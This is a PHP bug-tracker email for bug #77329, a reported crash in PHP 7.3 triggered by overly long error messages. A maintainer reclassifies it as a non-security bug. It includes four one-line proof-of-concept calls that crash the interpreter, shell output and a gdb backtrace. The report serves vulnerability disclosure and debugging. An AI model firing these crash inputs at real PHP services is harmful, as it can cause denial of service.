Sec Bug->Bug #77329 [Opn]: Buffer Overflow via overly long Error Messages
| From: | stas@php.net | Date: | Thu, 20 Dec 2018 21:00:49 +0000 |
| Subject: | Sec Bug->Bug #77329 [Opn]: Buffer Overflow via overly long Error Messages | ||
| References: | 1 | Groups: | php.bugs |
| Request: | Send a blank email to php-bugs+get-218537@lists.php.net to get a copy of this message | ||
Edit report at https://bugs.php.net/bug.php?id=77329&edit=1
ID: 77329
Updated by: stas@php.net
Reported by: h4x0n4ut at gmail dot com
Summary: Buffer Overflow via overly long Error Messages
Status: Open
-Type: Security
+Type: Bug
-Package: *General Issues
+Package: Scripting Engine problem
PHP Version: 7.3.0
-Assigned To:
+Assigned To: dmitry
Block user comment: N
Private report: Y
New Comment:
Requires specialized code to trigger, doesn't seem to be a security issue. Dmitry, since
it's your patch, could you take a look and confirm?
Previous Comments:
------------------------------------------------------------------------
[2018-12-20 19:12:28] h4x0n4ut at gmail dot com
Description:
------------
PHP 7.3 has a buffer overflow vulnerability that is caused by overly long error messages. Versions
prior to 7.3 seem unaffected.
This appears to be a fundamental problem that can be exploited via countless vectors, probably even
remotely.
The following code snippets cause PHP to crash:
PoC 0: file_get_contents(str_repeat("A",4200000));
PoC 1: rename(str_repeat("A", 2000000),str_repeat("A", 2000000));
PoC 2: $x4 = (str_repeat("A", 12000000));$x7 = get_meta_tags($x4,0);
PoC 3: popen(str_repeat("A", 2000000),str_repeat("A", 2000000));
The payloads were also tested against the php-7.3 packages of Arch Linux and Debian.
It appears as if the bug was introduced in commit [1] since the size of a buffer was reduced and the
crash was not reproducible with the previous revision [2]
[1] https://github.com/php/php-src/commit/da1f8097fa443281e29a3a06dc9dbaba8f053f97
[2] https://github.com/php/php-src/commit/1fbcebe100ecce8fa25788870c2eff08553ee91e
[asd@asd fff]$ ./php-src-1fbcebe100ecce8fa25788870c2eff08553ee91e/sapi/cli/php -r
'file_get_contents(str_repeat("A",4200000));'
Warning: file_get_contents(AAAAAAAAAAAAAAA[...]AAAAAAAAA in Command line code on line 1
[asd@asd fff]$ ./php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/sapi/cli/php -r
'file_get_contents(str_repeat("A",4200000));'
Segmentation fault (core dumped)
Expected result:
----------------
no crash
Actual result:
--------------
php > file_get_contents(str_repeat("A",42000000));
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff4b23ff2 in __memmove_avx_unaligned_erms () from /usr/lib/libc.so.6
(gdb) bt
#0 0x00007ffff4b23ff2 in __memmove_avx_unaligned_erms () from /usr/lib/libc.so.6
#1 0x0000555555a6dec5 in smart_string_appendl_ex (persistent=0 '\000', len=<optimized
out>, str=<optimized out>, dest=0x7fffffffcd90)
at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/Zend/zend_smart_string.h:90
#2 xbuf_format_converter (xbuf=0x7fffffffcd90, is_char=1 '\001', fmt=0x55555611214b
"s: %s", ap=0x7fffffffcdd0)
at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/main/spprintf.c:813
#3 0x0000555555acc3d5 in zend_vspprintf (pbuf=0x7fffffffcef8, max_len=0, format=<optimized
out>, ap=<optimized out>)
at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/Zend/zend.c:171
#4 0x0000555555acc4ef in zend_spprintf (message=message@entry=0x7fffffffcef8,
max_len=max_len@entry=0, format=format@entry=0x55555611214a "%s: %s")
at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/Zend/zend.c:195
#5 0x00005555556cc667 in php_verror (docref=0x7ffff3278200 "function.file-get-contents",
params=<optimized out>, type=2, format=<optimized out>,
args=args@entry=0x7fffffffcf60) at
/tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/main/main.c:928
#6 0x00005555556ccb57 in php_error_docref1 (docref=docref@entry=0x0,
param1=param1@entry=0x7fffecc00000 'A' <repeats 200 times>..., type=type@entry=2,
format=format@entry=0x55555611214a "%s: %s") at
/tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/main/main.c:983
#7 0x0000555555a81e2f in php_stream_display_wrapper_errors (wrapper=wrapper@entry=0x55555641ce40
<php_plain_files_wrapper>,
path=path@entry=0x7fffef600018 'A' <repeats 200 times>...,
caption=caption@entry=0x5555562787f3 "failed to open stream")
at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/main/streams/streams.c:207
#8 0x0000555555a84f95 in _php_stream_open_wrapper_ex (path=path@entry=0x7fffef600018 'A'
<repeats 200 times>..., mode=mode@entry=0x555556178f6d "rb",
options=<optimized out>, opened_path=opened_path@entry=0x0, context=<optimized out>)
at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/main/streams/streams.c:2104
#9 0x00005555559d49a4 in zif_file_get_contents (execute_data=<optimized out>,
return_value=0x7fffffffd280)
at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/ext/standard/file.c:550
#10 0x000055555594163c in phar_file_get_contents (execute_data=0x7ffff321b0a0,
return_value=0x7fffffffd280)
at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/ext/phar/func_interceptors.c:224
#11 0x0000555555b673aa in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER () at
/tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/Zend/zend_vm_execute.h:573
#12 execute_ex (ex=0x7ffff2e01000) at
/tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/Zend/zend_vm_execute.h:60291
#13 0x0000555555b6e96c in zend_execute (op_array=op_array@entry=0x7ffff3283000,
return_value=return_value@entry=0x7fffffffd340)
at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/Zend/zend_vm_execute.h:64320
#14 0x0000555555abe2ae in zend_eval_stringl (str=str@entry=0x7ffff3277000
"file_get_contents(str_repeat(\"A\",42000000));\n", str_len=str_len@entry=45,
retval_ptr=retval_ptr@entry=0x0, string_name=string_name@entry=0x55555624351e "php shell
code")
at /tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/Zend/zend_execute_API.c:1053
#15 0x000055555595d5c9 in readline_shell_run () at
/tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/ext/readline/readline_cli.c:681
#16 0x0000555555b70d26 in do_cli (argc=2, argv=0x55555646d190) at
/tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/sapi/cli/php_cli.c:1009
#17 0x00005555556e322c in main (argc=2, argv=0x55555646d190) at
/tmp/fff/php-src-da1f8097fa443281e29a3a06dc9dbaba8f053f97/sapi/cli/php_cli.c:1404
------------------------------------------------------------------------
--
Edit this bug report at https://bugs.php.net/bug.php?id=77329&edit=1